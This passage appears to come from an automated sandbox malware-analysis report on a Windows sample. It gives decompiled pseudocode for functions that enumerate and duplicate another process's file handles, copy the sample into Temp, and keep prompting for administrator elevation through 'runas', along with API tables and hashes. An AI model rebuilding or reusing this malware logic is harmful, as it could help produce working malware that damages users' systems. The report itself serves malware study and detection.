0x0040a570
0x0040a572
0x0040a57a
0x0040a58b
0x0040a591
0x0040a593
0x0040a595
0x0040a595
0x0040a597
0x00000000
0x00000000
0x0040a599
0x0040a59e
0x0040a59e
0x0040a5aa
0x0040a5aa
0x0040a5c3
0x0040a5c9
0x0040a5cb
0x0040a5cd
0x0040a5cd
0x0040a5cf
0x00000000
0x00000000
0x0040a5d1
0x0040a5d3
0x0040a5f5
0x0040a5fa
0x0040a600
0x0040a600
0x0040a60c
0x0040a60c
0x0040a626
0x0040a62c
0x0040a62e
0x0040a630
0x0040a630
0x0040a632
0x00000000
0x00000000
0x0040a634
0x0040a639
0x0040a639
0x0040a645
0x0040a645
0x0040a659
0x0040a65f
0x0040a661
0x0040a663
0x0040a663
0x0040a665
0x00000000
0x00000000
0x0040a667
0x0040a673
0x0040a673
0x0040a679
0x0040a694
0x0040a6c7
0x0040a6d4
0x0040a6e1
0x0040a6e9
0x0040a6e9
0x0040a6eb
0x00000000
0x00000000
0x0040a6ed
0x0040a6fd
0x0040a704
0x0040a70c
0x0040a70c
0x0040a70e
0x00000000
0x00000000
0x0040a710
0x0040a715
0x0040a718
0x0040a71a
0x0040a722
0x0040a728
0x0040a728
0x0040a72a
0x00000000
0x00000000
0x0040a72c
0x0040a728
0x0040a72e
0x0040a736

APIs

GetCurrentProcessId.KERNEL32 ref: 0040A0CF
GetTickCount.KERNEL32(-00000A5C), ref: 0040A0E8
GetModuleFileNameW.KERNEL32(00000000,-00001A58,00000105), ref: 0040A111
GetCurrentProcess.KERNEL32 ref: 0040A140
LookupAccountSidW.ADVAPI32(00000000,-00000208,-00000208,00000080,-00000308,00000080,00000000), ref: 0040A203
GetLastError.KERNEL32 ref: 0040A20D
lstrcpynW.KERNEL32(-00000410,00000000,0000020A), ref: 0040A263
lstrcpynW.KERNEL32(-00000410,00000000,00000105), ref: 0040A299
GetModuleFileNameW.KERNEL32(?,-00000410,0000020A), ref: 0040A34C
lstrcpynW.KERNEL32(-000000C4,00000000,?,00000040), ref: 0040A38F
lstrlenW.KERNEL32(-000000C4,?,00000040), ref: 0040A39F
lstrcpynW.KERNEL32(-00000850,-00000620,00000105,?,?,?,?,?,?,00000040), ref: 0040A403
lstrcatW.KERNEL32(-00000850,004187F0), ref: 0040A417
lstrcatW.KERNEL32(-00000850,-000000C4), ref: 0040A431
lstrcatW.KERNEL32(-00000850,00000000), ref: 0040A455
lstrlenA.KERNEL32(-000000A4,00000000,-00001420,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 0040A49B
GetCurrentProcess.KERNEL32 ref: 0040A4BD
GetVersionExA.KERNEL32(00000000), ref: 0040A4FE
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040A50E
GetProcAddress.KERNEL32(00000000), ref: 0040A515
GetWindowsDirectoryW.KERNEL32(-00001434,00000104), ref: 0040A562
GetEnvironmentVariableW.KERNEL32(SystemRoot,?,00000104), ref: 0040A58B
SetEnvironmentVariableW.KERNEL32(SystemRoot,-00001434), ref: 0040A5AA
GetEnvironmentVariableW.KERNEL32(USERPROFILE,-00001848,00000209), ref: 0040A5C3
SetEnvironmentVariableW.KERNEL32(USERPROFILE,-00001848), ref: 0040A60C
GetEnvironmentVariableW.KERNEL32(TEMP,-0000163E,0000020A), ref: 0040A626
SetEnvironmentVariableW.KERNEL32(TEMP,-00001848), ref: 0040A645
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,0000003F), ref: 0040A659
SetEnvironmentVariableA.KERNEL32(SystemDrive,00418850), ref: 0040A673
GetComputerNameW.KERNEL32(-00001DB0,0000007F), ref: 0040A694
lstrlenA.KERNEL32(-00001420,00000000,?), ref: 0040A6AD

Strings

IsWow64Process, xrefs: 0040A504
TEMP, xrefs: 0040A621, 0040A640
kernel32, xrefs: 0040A509
TEMP, xrefs: 0040A5D3
SystemRoot, xrefs: 0040A586, 0040A5A5
USERPROFILE, xrefs: 0040A5BE, 0040A607
LookupAccountSidW() err %u, xrefs: 0040A21A
%s\%s, xrefs: 0040A5E2
SystemDrive, xrefs: 0040A654, 0040A66E

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: EnvironmentVariable$lstrcpyn$CurrentModuleNameProcesslstrcatlstrlen$File$AccountAddressComputerCountDirectoryErrorHandleLastLookupProcTickVersionWindows
String ID: %s\%s$IsWow64Process$LookupAccountSidW() err %u$SystemDrive$SystemRoot$TEMP$TEMP$USERPROFILE$kernel32
API String ID: 2722344402-164610414
Opcode ID: c7d7efe0d362291cfb400f000abd0764e893b3670eea3703355e82b70a163398
Instruction ID: b567133244118767990dc71daca167fb00b021c4c4af0e2eaeea76158077c97a
Opcode Fuzzy Hash: c7d7efe0d362291cfb400f000abd0764e893b3670eea3703355e82b70a163398
Instruction Fuzzy Hash: EE127474A00204ABDB04DF54DC55FEA3775EF84349F18C13AFA09AB3C1DA39DA518B9A

Uniqueness

Uniqueness Score: 100.00%

Function 0040C370, Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 297
libraryloadernativeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E0040C370(intOrPtr _a4) {
				_Unknown_base(*)()* _v8;
				signed int _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				signed int _v32;
				long _v36;
				WCHAR* _v40;
				_Unknown_base(*)()* _v44;
				signed int _v48;
				_Unknown_base(*)()* _v52;
				void* _v56;
				WCHAR* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed short _v74;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _t104;
				signed int _t107;
				signed int _t108;
				WCHAR* _t110;
				intOrPtr* _t120;
				signed int _t124;
				signed int _t127;
				signed int _t129;
				signed int _t132;
				WCHAR* _t137;
				signed int _t146;
				signed int _t159;
				signed int _t162;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;

				_v32 = 0;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v20 = 0;
				_v28 = 0x10000;
				_v24 = 0;
				_v40 = 0;
				_v48 = 0;
				_v12 = 0;
				_v8 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
				_v52 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtDuplicateObject");
				_v44 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryObject");
				if(_v8 == 0 || _v52 == 0 || _v44 == 0) {
					while(0 != 0) {
					}
					return 0;
				} else {
					_t148 =  *0x4211b4; // 0x8e4
					_v24 = OpenProcess(0x40, 0, _t148);
					__eflags = _v24;
					if(_v24 != 0) {
						_t104 = E00403EE0(_t148, _v28);
						_t192 = _t191 + 4;
						_v20 = _t104;
						__eflags = _v20;
						if(_v20 != 0) {
							while(1) {
								_v36 = NtQuerySystemInformation(0x10, _v20, _v28, 0);
								__eflags = _v36 - 0xc0000004;
								if(_v36 != 0xc0000004) {
									break;
								}
								_t148 = _v28 << 1;
								_t146 = E00403FC0(_v28 << 1,  &_v20, _v28, _v28 << 1); // executed
								_t192 = _t192 + 0xc;
								__eflags = _t146;
								if(_t146 != 0) {
									_v28 = _v28 << 1;
									continue;
								} else {
									goto L16;
								}
								while(1) {
									L16:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								L65:
								E00403F10( &_v48, 0);
								E00403F10( &_v12, 0);
								E00403F10( &_v40, 0);
								E00403F10( &_v20, 0);
								__eflags = _v24;
								if(_v24 != 0) {
									CloseHandle(_v24); // executed
								}
								return _v32;
							}
							__eflags = _v36;
							if(_v36 >= 0) {
								_t107 = E00403EE0(_t148, 0x1000);
								_t193 = _t192 + 4;
								_v48 = _t107;
								__eflags = _v48;
								if(_v48 != 0) {
									_t108 = E00403EE0(_t148, 0x1000);
									_t194 = _t193 + 4;
									_v12 = _t108;
									__eflags = _v12;
									if(_v12 != 0) {
										_t110 = E00404AE0(_a4);
										_t194 = _t194 + 4;
										_v40 = _t110;
										__eflags = _v40;
										if(_v40 == 0) {
											L62:
											__eflags = _v32;
											if(_v32 != 0) {
												goto L65;
											} else {
												goto L63;
											}
											while(1) {
												L63:
												__eflags = 0;
												if(0 == 0) {
													goto L65;
												}
											}
											goto L65;
										}
										_v16 = 0;
										while(1) {
											__eflags = _v16 -  *_v20;
											if(_v16 >=  *_v20) {
												goto L62;
											}
											_t48 = (_v16 << 4) + 4; // 0x4
											_t120 = _v20 + _t48;
											_v80 =  *_t120;
											_v76 =  *((intOrPtr*)(_t120 + 4));
											_v72 =  *((intOrPtr*)(_t120 + 8));
											_v68 =  *((intOrPtr*)(_t120 + 0xc));
											_v56 = 0;
											__eflags = _v80 -  *0x4211b4; // 0x8e4
											if(__eflags == 0) {
												_t124 = NtDuplicateObject(_v24, _v74 & 0x0000ffff, GetCurrentProcess(),  &_v56, 0, 0, 0);
												__eflags = _t124;
												if(_t124 >= 0) {
													E00404120(_v48, _v48, 0, 0x1000);
													_t194 = _t194 + 0xc;
													_t127 = _v44(_v56, 2, _v48, 0x1000, 0);
													__eflags = _t127;
													if(_t127 >= 0) {
														_t157 =  *((intOrPtr*)(_v48 + 4));
														_t129 = E00403E60( *((intOrPtr*)(_v48 + 4)),  *((intOrPtr*)(_v48 + 4)), L"File");
														_t194 = _t194 + 8;
														__eflags = _t129;
														if(_t129 == 0) {
															__eflags = _v68 - 0x12019f;
															if(_v68 != 0x12019f) {
																E00404120(_t157, _v12, 0, 0x1000);
																_t194 = _t194 + 0xc;
																_t132 = _v44(_v56, 1, _v12, 0x1000, 0);
																__eflags = _t132;
																if(_t132 >= 0) {
																	_t159 = _v12;
																	_v64 =  *_t159;
																	_v60 =  *((intOrPtr*)(_t159 + 4));
																	__eflags = _v64 & 0x0000ffff;
																	if((_v64 & 0x0000ffff) == 0) {
																		L61:
																		CloseHandle(_v56); // executed
																		L34:
																		_t162 = _v16 + 1;
																		__eflags = _t162;
																		_v16 = _t162;
																		continue;
																	} else {
																		goto L55;
																	}
																	while(1) {
																		L55:
																		__eflags = 0;
																		if(0 == 0) {
																			break;
																		}
																	}
																	_t137 = StrStrIW(_v60, _v40);
																	__eflags = _t137;
																	if(_t137 == 0) {
																		goto L61;
																	} else {
																		goto L58;
																	}
																	while(1) {
																		L58:
																		__eflags = 0;
																		if(0 == 0) {
																			break;
																		}
																	}
																	_v32 = 1;
																	goto L62;
																} else {
																	goto L51;
																}
																while(1) {
																	L51:
																	__eflags = 0;
																	if(0 == 0) {
																		break;
																	}
																}
																CloseHandle(_v56);
																goto L34;
															} else {
																goto L47;
															}
															while(1) {
																L47:
																__eflags = 0;
																if(0 == 0) {
																	break;
																}
															}
															CloseHandle(_v56);
															goto L34;
														}
														CloseHandle(_v56); // executed
														goto L34;
													} else {
														goto L41;
													}
													while(1) {
														L41:
														__eflags = 0;
														if(0 == 0) {
															break;
														}
													}
													CloseHandle(_v56);
													goto L34;
												}
												goto L34;
											}
											goto L34;
										}
										goto L62;
									} else {
										goto L29;
									}
									while(1) {
										L29:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									goto L65;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								goto L65;
							} else {
								goto L21;
							}
							while(1) {
								L21:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							goto L65;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						goto L65;
					} else {
						goto L7;
					}
					while(1) {
						L7:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 0;
				}
			}

0x0040c376
0x0040c37d
0x0040c384
0x0040c38b
0x0040c392
0x0040c399
0x0040c3a0
0x0040c3a7
0x0040c3ae
0x0040c3b5
0x0040c3d3
0x0040c3ed
0x0040c407
0x0040c40e
0x0040c41c
0x0040c420
0x00000000
0x0040c429
0x0040c429
0x0040c43a
0x0040c43d
0x0040c441
0x0040c454
0x0040c459
0x0040c45c
0x0040c45f
0x0040c463
0x0040c470
0x0040c47f
0x0040c482
0x0040c489
0x00000000
0x00000000
0x0040c48e
0x0040c499
0x0040c49e
0x0040c4a1
0x0040c4a3
0x0040c4b5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c4a5
0x0040c4a5
0x0040c4a5
0x0040c4a7
0x00000000
0x00000000
0x0040c4a9
0x0040c6be
0x0040c6c4
0x0040c6d2
0x0040c6e0
0x0040c6ee
0x0040c6f6
0x0040c6fa
0x0040c700
0x0040c700
0x00000000
0x0040c706
0x0040c4ba
0x0040c4be
0x0040c4d0
0x0040c4d5
0x0040c4d8
0x0040c4db
0x0040c4df
0x0040c4f1
0x0040c4f6
0x0040c4f9
0x0040c4fc
0x0040c500
0x0040c511
0x0040c516
0x0040c519
0x0040c51c
0x0040c520
0x0040c6b2
0x0040c6b2
0x0040c6b6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c6b8
0x0040c6b8
0x0040c6b8
0x0040c6ba
0x00000000
0x00000000
0x0040c6bc
0x00000000
0x0040c6b8
0x0040c526
0x0040c538
0x0040c53e
0x0040c540
0x00000000
0x00000000
0x0040c54f
0x0040c54f
0x0040c555
0x0040c55b
0x0040c561
0x0040c567
0x0040c56a
0x0040c574
0x0040c57a
0x0040c598
0x0040c59b
0x0040c59d
0x0040c5ac
0x0040c5b1
0x0040c5c5
0x0040c5c8
0x0040c5ca
0x0040c5e9
0x0040c5ed
0x0040c5f2
0x0040c5f5
0x0040c5f7
0x0040c608
0x0040c60f
0x0040c631
0x0040c636
0x0040c64a
0x0040c64d
0x0040c64f
0x0040c666
0x0040c66e
0x0040c671
0x0040c678
0x0040c67a
0x0040c6a3
0x0040c6a7
0x0040c52f
0x0040c532
0x0040c532
0x0040c535
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c67c
0x0040c67c
0x0040c67c
0x0040c67e
0x00000000
0x00000000
0x0040c680
0x0040c68a
0x0040c690
0x0040c692
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c694
0x0040c694
0x0040c694
0x0040c696
0x00000000
0x00000000
0x0040c698
0x0040c69a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c651
0x0040c651
0x0040c651
0x0040c653
0x00000000
0x00000000
0x0040c655
0x0040c65b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c611
0x0040c611
0x0040c611
0x0040c613
0x00000000
0x00000000
0x0040c615
0x0040c61b
0x00000000
0x0040c61b
0x0040c5fd
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c5cc
0x0040c5cc
0x0040c5cc
0x0040c5ce
0x00000000
0x00000000
0x0040c5d0
0x0040c5d6
0x00000000
0x0040c5d6
0x00000000
0x0040c59f
0x00000000
0x0040c57c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c502
0x0040c502
0x0040c502
0x0040c504
0x00000000
0x00000000
0x0040c506
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c4e1
0x0040c4e1
0x0040c4e1
0x0040c4e3
0x00000000
0x00000000
0x0040c4e5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c4c0
0x0040c4c0
0x0040c4c0
0x0040c4c2
0x00000000
0x00000000
0x0040c4c4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c465
0x0040c465
0x0040c465
0x0040c467
0x00000000
0x00000000
0x0040c469
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c443
0x0040c443
0x0040c443
0x0040c445
0x00000000
0x00000000
0x0040c447
0x00000000
0x0040c449

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtQuerySystemInformation), ref: 0040C3C6
GetProcAddress.KERNEL32(00000000), ref: 0040C3CD
GetModuleHandleA.KERNEL32(ntdll.dll,NtDuplicateObject), ref: 0040C3E0
GetProcAddress.KERNEL32(00000000), ref: 0040C3E7
GetModuleHandleA.KERNEL32(ntdll.dll,NtQueryObject), ref: 0040C3FA
GetProcAddress.KERNEL32(00000000), ref: 0040C401
OpenProcess.KERNEL32(00000040,00000000,000008E4), ref: 0040C434
NtQuerySystemInformation.NTDLL(00000010,00000000,00010000,00000000), ref: 0040C47C

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

Part of subcall function 00404AE0: lstrlenA.KERNEL32(0040C516,0040C516,00000000), ref: 00404AEA

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C588
NtDuplicateObject.NTDLL(00000000,?,00000000), ref: 0040C598
CloseHandle.KERNEL32(00000000), ref: 0040C5D6
_wcscmp.LIBCMTD ref: 0040C5ED
CloseHandle.KERNELBASE(00000000), ref: 0040C5FD
CloseHandle.KERNEL32(00000000), ref: 0040C61B
CloseHandle.KERNEL32(00000000), ref: 0040C65B
StrStrIW.SHLWAPI(?,00000000), ref: 0040C68A
CloseHandle.KERNELBASE(00000000), ref: 0040C6A7
CloseHandle.KERNELBASE(00000000), ref: 0040C700

Strings

ntdll.dll, xrefs: 0040C3C1, 0040C3DB, 0040C3F5
File, xrefs: 0040C5E1
NtQueryObject, xrefs: 0040C3F0
NtQuerySystemInformation, xrefs: 0040C3BC
NtDuplicateObject, xrefs: 0040C3D6

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Handle$Close$AddressModuleProc$Process$AllocateCurrentDuplicateHeapInformationObjectOpenQuerySystem_wcscmplstrlen
String ID: File$NtDuplicateObject$NtQueryObject$NtQuerySystemInformation$ntdll.dll
API String ID: 2730040895-463282066
Opcode ID: f748beb2f5e9cc7e0c8135abbff964e6b3312cd64d26d2bcee7ba1dced707313
Instruction ID: 4b133b4c920f8a08125715ac44a07e4a89d8cb82d711449a83b194a7c57dbcfd
Opcode Fuzzy Hash: f748beb2f5e9cc7e0c8135abbff964e6b3312cd64d26d2bcee7ba1dced707313
Instruction Fuzzy Hash: 10B170B4D00209EBDB14DBE4D895BFEB7B5BB48305F20863BE501B62C0D7799941CB5A

Uniqueness

Uniqueness Score: 100.00%

Function 004031F0, Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 333
UNIQUECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			_entry_() {
				short* _v8;
				void _v1034;
				short _v1036;
				WCHAR* _v1040;
				int _v1044;
				PWCHAR* _v1048;
				int _v1052;
				short* _v1056;
				short* _v1060;
				void* _v1064;
				short* _v1068;
				short _v1588;
				signed int _v1592;
				short _t69;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				signed int _t88;
				signed int _t91;
				int _t96;
				intOrPtr _t107;
				signed int _t119;
				PWCHAR* _t126;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t156;
				void* _t169;

				_t69 =  *0x41f6dc; // 0x0
				_v1036 = _t69;
				memset( &_v1034, 0, 0x3fe);
				_t147 = _t146 + 0xc;
				_v1048 = 0;
				_v8 = 0;
				_v1044 = 0;
				_v1060 = 0;
				_v1052 = 0;
				_v1056 = 0;
				_v1040 = GetCommandLineW();
				_v1048 = CommandLineToArgvW(_v1040,  &_v1044);
				if(_v1048 != 0) {
					E00403EC0(); // executed
					do {
						__eflags = 0;
					} while (0 != 0);
					do {
						__eflags = 0;
					} while (0 != 0);
					_t75 = E00407D90(0, 3); // executed
					_t148 = _t147 + 4;
					_v1052 = _t75;
					__eflags = _v1052;
					if(_v1052 >= 0) {
						 *0x41f6c4 = GetModuleHandleA(0);
						_t118 =  *0x41f6c4;
						_t77 = E0040A070( *0x41f6c4, 0, 0); // executed
						_t149 = _t148 + 0xc;
						__eflags = _t77;
						if(_t77 != 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t78 = E0040C170(_t118); // executed
							__eflags = _t78;
							if(_t78 == 0) {
								_push(0);
								_t79 = E00407A30(_t118, 0x41e030);
								_t150 = _t149 + 8;
								__eflags = _t79;
								if(_t79 >= 0) {
									__eflags = _v1044 - 1;
									if(_v1044 <= 1) {
										_t119 =  *0x421408; // 0x0
										_t120 = _t119 & 0x00000040;
										__eflags = _t119 & 0x00000040;
										if(__eflags == 0) {
											_t107 = E0040B500(); // executed
											 *0x41ffac = _t107;
										}
										_t80 = E00402D30(_t120, __eflags, _t169);
										__eflags = _t80;
										if(_t80 != 0) {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags =  *0x41fb68 - 3;
											if( *0x41fb68 != 3) {
												__eflags =  *0x421408 - 0x10;
												if( *0x421408 != 0x10) {
													_t81 = E00408AF0(0, 0);
													__eflags = _t81;
													if(_t81 != 0) {
														_t83 = E00408AF0(1, 0);
														__eflags = _t83;
														if(_t83 != 0) {
															E00408C10(1);
															_t122 =  *0x41fb6c;
															_t85 = E0040BB30(E00402A60,  *0x41fb6c);
															__eflags = _t85;
															if(_t85 == 0) {
																E004025E0(_t122);
															}
															E00408C10(0);
														}
													}
												} else {
													_t88 = E00408AF0(0, 0);
													_t156 = _t150 + 8;
													__eflags = _t88;
													if(_t88 != 0) {
														_t91 = E00408AF0(1, 0);
														_t156 = _t156 + 8;
														__eflags = _t91;
														if(_t91 != 0) {
															E004025E0(0);
														}
													}
													E00408C10(1);
													E00408C10(0);
												}
												goto L91;
											}
											_push(E00403E00(0));
											E00403B30( &_v1588, 0x104, L"%s\\%d.exe", "C:\Users\Luke\AppData\Local\Temp");
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_t96 = CopyFileW("C:\Users\Luke\Desktop\zhAQkCQvME.exe",  &_v1588, 0);
											__eflags = _t96;
											if(_t96 != 0) {
												E004041B0( &_v1588,  &_v1588, 0, 0, 1);
												_v1052 = 0;
												goto L91;
											} else {
												goto L77;
											}
											while(1) {
												L77:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_v1052 = 0xffffffff;
										} else {
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													goto L52;
												}
											}
											while(1) {
												L52:
												__eflags = 0;
												if(0 == 0) {
													goto L54;
												}
											}
											while(1) {
												L54:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags =  *0x420b90 - 1;
											if( *0x420b90 != 1) {
												E00402C20(0, _t169, 0, 0); // executed
												goto L91;
											}
											_v1068 = 0;
											__imp__CoInitializeEx(0, 6);
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_push(0);
											_push("\"");
											_push("C:\Users\Luke\Desktop\zhAQkCQvME.exe");
											_push("\"");
											_v1068 = E00404CB0(L"/c ");
											do {
												_v1064 = ShellExecuteW(GetForegroundWindow(), L"runas", L"cmd", _v1068, 0, 0);
												__eflags = _v1064 - 5;
												if(_v1064 != 5) {
													goto L65;
												} else {
													goto L62;
												}
												while(1) {
													L62:
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
												Sleep(0x7d0);
												L65:
												__eflags = _v1064 - 5;
											} while (_v1064 == 5);
											while(1) {
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											E00403F10( &_v1068, 0xfffffffe);
											_v1052 = 0;
										}
										goto L91;
									}
									_t126 = _v1048;
									__eflags = ( *( *(_t126 + 4)) & 0x0000ffff) - 0x2f;
									if(( *( *(_t126 + 4)) & 0x0000ffff) == 0x2f) {
										_v1592 = _v1048[1][1] & 0x0000ffff;
										_v1592 = _v1592 - 0x41;
										__eflags = _v1592 - 0x33;
										if(__eflags > 0) {
											while(1) {
												L43:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											_v1052 = 2;
											L46:
											goto L91;
										}
										_t33 = _v1592 + 0x40374c; // 0xec8b550a
										switch( *((intOrPtr*)(( *_t33 & 0x000000ff) * 4 +  &M0040371C))) {
											case 0:
												_push(_v1048[3]);
												L00403AB0();
												E00403780(_t169, _v1048[3], _v1048[2]);
												_v1052 = 0;
												goto L46;
											case 1:
												_v1052 = E0040B340(__ecx, __edx);
												goto L46;
											case 2:
												__eax = E00402C20(__ecx, __fp0, 0, 1);
												__eflags = _v1044 - 2;
												if(__eflags > 0) {
													__eax = _v1048;
													__ecx = _v1048[2];
													__eax = E0040BF20(_v1048[2], __eflags, _v1048[2]);
												}
												goto L46;
											case 3:
												__ecx = _v1048;
												__edx = _v1048[2];
												_v1052 = E00401600(_v1048[2]);
												goto L46;
											case 4:
												_v1052 = 0x6f;
												goto L46;
											case 5:
												__eax = E004018C0();
												_v1052 = 1;
												goto L46;
											case 6:
												__eax = E00403050(__ecx, __edx, __eflags);
												goto L46;
											case 7:
												_v1052 = E00402F70(__ecx, __eflags);
												goto L46;
											case 8:
												__eax = E00402C20(__ecx, __fp0, 0, 0);
												__eflags = _v1044 - 2;
												if(__eflags > 0) {
													__edx = _v1048;
													_v1048[4] = E0040BF20(__ecx, __eflags, _v1048[4]);
												}
												goto L46;
											case 9:
												 *0x41ffac = E0040B500();
												__eax = E00401420();
												goto L46;
											case 0xa:
												__eax = E004018E0();
												goto L46;
											case 0xb:
												goto L43;
										}
									} else {
										goto L23;
									}
									while(1) {
										L23:
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_v1052 = 2;
									goto L91;
								} else {
									goto L18;
								}
								while(1) {
									L18:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v1052 = 3;
								goto L91;
							}
							_v1052 = 0;
							goto L91;
						}
						_v1052 = 1;
						goto L91;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v1052 = 1;
					goto L91;
				} else {
					_v1052 = 1;
					L91:
					while(0 != 0) {
					}
					ExitProcess(_v1052);
				}
			}

0x004031f9
0x004031ff
0x00403214
0x00403219
0x0040321c
0x00403226
0x0040322d
0x00403237
0x00403241
0x0040324b
0x0040325b
0x00403275
0x00403282
0x00403293
0x00403298
0x00403298
0x00403298
0x0040329e
0x0040329e
0x0040329e
0x004032a6
0x004032ab
0x004032ae
0x004032b4
0x004032bb
0x004032da
0x004032e3
0x004032ea
0x004032ef
0x004032f2
0x004032f4
0x00403305
0x00403305
0x00403307
0x00000000
0x00000000
0x00403309
0x0040330b
0x00403310
0x00403312
0x00403323
0x0040332a
0x0040332f
0x00403332
0x00403334
0x0040334b
0x00403352
0x004034d2
0x004034d8
0x004034d8
0x004034db
0x004034dd
0x004034e2
0x004034e2
0x004034e7
0x004034ec
0x004034ee
0x004035d3
0x004035d3
0x004035d5
0x00000000
0x00000000
0x004035d7
0x004035d9
0x004035e0
0x00403666
0x0040366d
0x004036ae
0x004036b6
0x004036b8
0x004036be
0x004036c6
0x004036c8
0x004036cc
0x004036d4
0x004036e0
0x004036e8
0x004036ea
0x004036ec
0x004036ec
0x004036f3
0x004036f8
0x004036c8
0x0040366f
0x00403673
0x00403678
0x0040367b
0x0040367d
0x00403683
0x00403688
0x0040368b
0x0040368d
0x0040368f
0x0040368f
0x0040368d
0x00403696
0x004036a0
0x004036a5
0x00000000
0x0040366d
0x004035f0
0x00403607
0x0040360f
0x0040360f
0x00403611
0x00000000
0x00000000
0x00403613
0x00403623
0x00403629
0x0040362b
0x0040364f
0x00403657
0x00000000
0x00000000
0x00000000
0x00000000
0x0040362d
0x0040362d
0x0040362d
0x0040362f
0x00000000
0x00000000
0x00403631
0x00403633
0x004034f4
0x004034f4
0x004034f4
0x004034f6
0x00000000
0x00000000
0x004034f8
0x004034fa
0x004034fa
0x004034fa
0x004034fc
0x00000000
0x00000000
0x004034fe
0x00403500
0x00403500
0x00403500
0x00403502
0x00000000
0x00000000
0x00403504
0x00403506
0x0040350d
0x004035c6
0x00000000
0x004035cb
0x00403513
0x00403521
0x00403527
0x00403527
0x00403529
0x00000000
0x00000000
0x0040352b
0x0040352d
0x0040352f
0x00403534
0x00403539
0x0040354b
0x00403551
0x00403573
0x00403579
0x00403580
0x00000000
0x00000000
0x00000000
0x00000000
0x00403582
0x00403582
0x00403582
0x00403584
0x00000000
0x00000000
0x00403586
0x0040358d
0x00403593
0x00403593
0x00403593
0x0040359c
0x0040359c
0x0040359e
0x00000000
0x00000000
0x004035a0
0x004035ab
0x004035b3
0x004035b3
0x00000000
0x004034ee
0x00403358
0x00403364
0x00403367
0x0040338b
0x0040339a
0x004033a0
0x004033a7
0x004034bd
0x004034bd
0x004034bd
0x004034bf
0x00000000
0x00000000
0x004034c1
0x004034c3
0x004034cd
0x00000000
0x004034cd
0x004033b3
0x004033ba
0x00000000
0x004033ca
0x004033d5
0x004033de
0x004033e6
0x00000000
0x00000000
0x0040347b
0x00000000
0x00000000
0x004033f9
0x00403401
0x00403408
0x0040340a
0x00403410
0x00403414
0x00403419
0x00000000
0x00000000
0x004034a3
0x004034a9
